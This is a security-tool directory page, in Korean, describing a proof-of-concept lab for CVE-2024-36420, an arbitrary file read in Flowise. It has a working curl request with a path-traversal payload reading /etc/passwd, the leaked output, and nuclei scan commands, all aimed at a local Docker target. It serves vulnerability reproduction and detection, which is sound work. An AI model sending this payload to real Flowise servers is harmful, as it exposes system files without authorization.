Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/fineman999/poc_cve-2024-36420
Vulnerability AnalysisExploitationWeb Application ExploitationFuzzingLearning & EducationLabs & Practice
GitHubfineman999/poc_cve-2024-36420

POC_CVE-2024-36420

POC_CVE-2024-36420

저장소 보기
3개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

POC_CVE-2024-36420

CVE-2024-36420에 영향을 받는 Flowise를 위한 로컬 재현 실습 및 nuclei 템플릿 초안.

요약

CVE-2024-36420은 Flowise에서 fileName 본문 매개변수를 적절히 검증하지 않아 발생하는 임의 파일 읽기 취약점이며, 다음 엔드포인트에서 트리거됩니다:

  • POST /api/v1/openai-assistants-file

이 실습은 다음을 검증하는 데 사용되었습니다:

  • flowiseai/flowise:1.4.3에서 취약한 동작
  • 최신 flowiseai/flowise:3.1.2에서 차단된 동작

참고 자료

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-36420
  • GitHub Security Lab: https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/

파일

  • docker-compose.yml
  • docker-compose.latest.yml
  • CVE-2024-36420.yaml

취약한 테스트

Flowise 1.4.3 시작:

root@kitploit:~
docker compose down -v
docker compose up -d
docker compose logs --tail=100 flowise

수동 확인:

root@kitploit:~
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

관찰된 취약한 응답:

root@kitploit:~
HTTP/1.1 200 OK
Content-Disposition: attachment; filename=passwd
...
root:x:0:0:root:/root:/bin/ash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
...

최신 버전 비교

최신 Flowise 3.1.2 시작:

root@kitploit:~
docker compose -f docker-compose.latest.yml down -v
docker compose -f docker-compose.latest.yml up -d
docker compose -f docker-compose.latest.yml logs --tail=100 flowise

수동 확인:

root@kitploit:~
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

관찰된 최신 버전 응답:

root@kitploit:~
HTTP/1.1 401 Unauthorized
{"error":"Unauthorized Access"}

Nuclei

템플릿 검증:

root@kitploit:~
nuclei -duc -validate -t CVE-2024-36420.yaml

취약한 대상에서 실행:

root@kitploit:~
nuclei -duc -u http://127.0.0.1:3000 -t CVE-2024-36420.yaml

예상되는 동작:

  • 1.4.3: 일치
  • 3.1.2: 불일치

참고 사항

  • 이 리포지토리는 관찰된 동작만을 주장하므로 버전 차이는 허용됩니다:
    • 1.4.3에서 취약함
    • 3.1.2에서 차단됨
  • 정확한 패치된 버전 경계를 주장하지 않습니다.
  • 실제 대상은 사용되지 않았습니다.
도구 다운로드